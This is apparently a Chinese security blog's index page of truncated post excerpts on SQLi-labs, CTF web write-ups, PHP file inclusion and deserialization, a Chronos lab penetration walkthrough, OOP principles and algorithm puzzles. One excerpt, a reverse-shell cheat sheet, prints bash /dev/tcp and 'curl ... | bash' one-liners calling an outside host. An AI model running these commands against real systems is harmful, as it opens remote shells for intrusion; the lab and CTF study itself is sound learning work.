靶场之SQlilabs
Less-1 首先查看源码可以看到注入为字符型 if(isset($_GET['id'])) { $id=$_GET['id']; //logging the connection parameters to a file for analysis. $fp=fopen('result.txt','a'); fwrite($fp,'ID:'.$id…
2021祥云杯部分web复现
Package Manager 考察:sql注入 给出了源码,可以找到注入点,这里可以绕过token 尝试闭合202cb962ac59075b964b07152d234b70"||this.username=="admin 直接跳转到了/packages/submit,可以注入, 直接跑密码 import requests import strin…
PHP文件包含
相关函数 php中引发文件包含漏洞的通常是以下四个函数: - include() - include_once() - require() - require_once() reuqire() 如果在包含的过程中有错,比如文件不存在等,则会直接退出,不执行后续语句。 include() 如果出错的话,只会提出警告,会继续执行后续语句。 requir…
靶机Chronos渗透
涉及攻击方法: 端口扫描 WEB侦查 命令注入 数据编解码 搜索大法 框架漏洞利用 代码审计 NC串联 本地提权 使用的工具 netdiscover nmap burpsuit CyberChef 部署好靶机,我使用的桥接方式 渗透 使用netdiscover扫描192.168.0.0/16,可以看到靶机ip是192.168.0.134 使用nma…
php反序列化
PHP反序列化链 PoP链的核心,就是魔术方法。而php的魔术方法中涉及到反序列化的大致有以下几种: __destruct: 析构函数,会在到某个对象的所有引用都被删除或者当对象被显式销毁时执行。一般来说,也是Pop链的入口。 __toString: 类对象遇到字符串操作时触发。 __wakeup: 类实例反序列化时触发。 __call: 当调用了…
各种花式弹shell
Linux反弹shell bash bash -i >& /dev/tcp/192.168.0.135/4444 0>&1 curl curl 192.168.0.135/shell | bash shell文件内容 bash -i >& /dev/tcp/192.168.0.135/4444 0>&…
【CyBRICS 2021】Ad Network
解题 这是个无限套娃题 题目提示重定向到深处 进首页什么也没发现,看源码发现有层目录/adnetwork 直接访问发现一直进不去,分析下网络,一直在重定向,直接抓包 发现可以获取到重定向链接,直接用脚本跑 import requests import re # 保持网站会话 s = requests.Session() # 发送get请求 url …
OOP七大原则
一、开闭原则(Open-Closed Principle,OCP) 1、开闭原则定义 开闭原则:一个软件实体如类、模块应该对扩展开放,对修改关闭。即在不修改软件实体的基础上去扩展其功能。 Open(Open for extension):软件实体的行为必须是开放的、支持扩展的,而不是僵化的。 Closed(Closed for modificati…
制作 m 束花所需的最少天数
题目 给你一个整数数组bloomDay,以及两个整数m和k。 现需要制作m束花。制作花束时,需要使用花园中 相邻的k朵花 。 花园中有n朵花,第i朵花会在bloomDay[i]时盛开,恰好可以用于一束花中。 请你返回从花园中摘 m 束花需要等待的最少的天数。如果不能摘到 m 束花则返回-1。 解题 查找所需最小的天数,那么天数必然在最大天数和最小天…
完成所有工作的最短时间
题目 给你一个整数数组 jobs ,其中jobs[i]是完成第 i 项工作要花费的时间。 请你将这些工作分配给k位工人。所有工作都应该分配给工人,且每项工作只能分配给一位工人。工人的 工作时间 是完成分配给他们的所有工作花费时间的总和。请你设计一套最佳的工作分配方案,使工人的 最大工作时间 得以 最小化 。 返回分配方案中尽可能 最小 的 最大工作…